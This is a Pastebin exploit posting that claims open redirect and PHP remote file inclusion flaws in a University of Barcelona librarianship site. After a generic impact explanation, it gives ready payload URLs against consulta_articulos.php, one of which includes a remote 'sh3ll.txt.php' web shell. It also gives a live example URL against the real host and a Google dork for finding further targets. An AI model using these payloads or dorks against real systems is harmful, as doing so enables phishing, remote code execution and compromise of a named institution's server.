Advertisement
KingSkrupellos

University of Barcelona Librarianship RFI Open Redirection

Mar 21st, 2019
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.18 KB | None | 0 0
  1. ############################################################################################
  2.  
  3. # Exploit Title : University of Barcelona Librarianship Center Spain RFI Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 22/03/2019
  7. # Vendor Homepage : bid.ub.edu
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Google Dorks : BiD: textos universitaris de biblioteconomia i documentació Universitat de Barcelona
  12. # Vulnerability Type :
  13. CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  14. CWE-98 [ Improper Control of Filename for Include/Require Statement
  15. in PHP Program ('PHP Remote File Inclusion') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ############################################################################################
  21.  
  22. # Impact :
  23. ***********
  24. * University of Barcelona Librarianship and Documentation Center in Spain - accepts a user-controlled input that specifies
  25.  
  26. a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain
  27.  
  28. a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to
  29.  
  30. a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  31.  
  32. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
  33.  
  34. Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
  35.  
  36. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter
  37.  
  38. redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another
  39.  
  40. company. Visiting unreal web page user's computer becomes affected by malware the task of which is
  41.  
  42. to deceive the valid actor and steal his personal data.
  43.  
  44. * The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the
  45.  
  46. input before its usage in "require," "include," or similar functions.
  47.  
  48. ############################################################################################
  49.  
  50. # Open Redirection and Remote File Inclusion Exploit :
  51. ************************************************
  52. /consulta_articulos.php?url=https://www.[REDIRECTION-ADDRESS].gov
  53.  
  54. /consulta_articulos.php?url=https://www.[SHELL-ADDRESS].gov/sh3ll.txt.php
  55.  
  56. ############################################################################################
  57.  
  58. # Example Vulnerable Site :
  59. *************************
  60. [+] bid.ub.edu/consulta_articulos.php?url=https://cxsecurity.com/ => [ Proof ] => archive.is/6pcgC
  61.  
  62. ############################################################################################
  63.  
  64. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  65.  
  66. ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement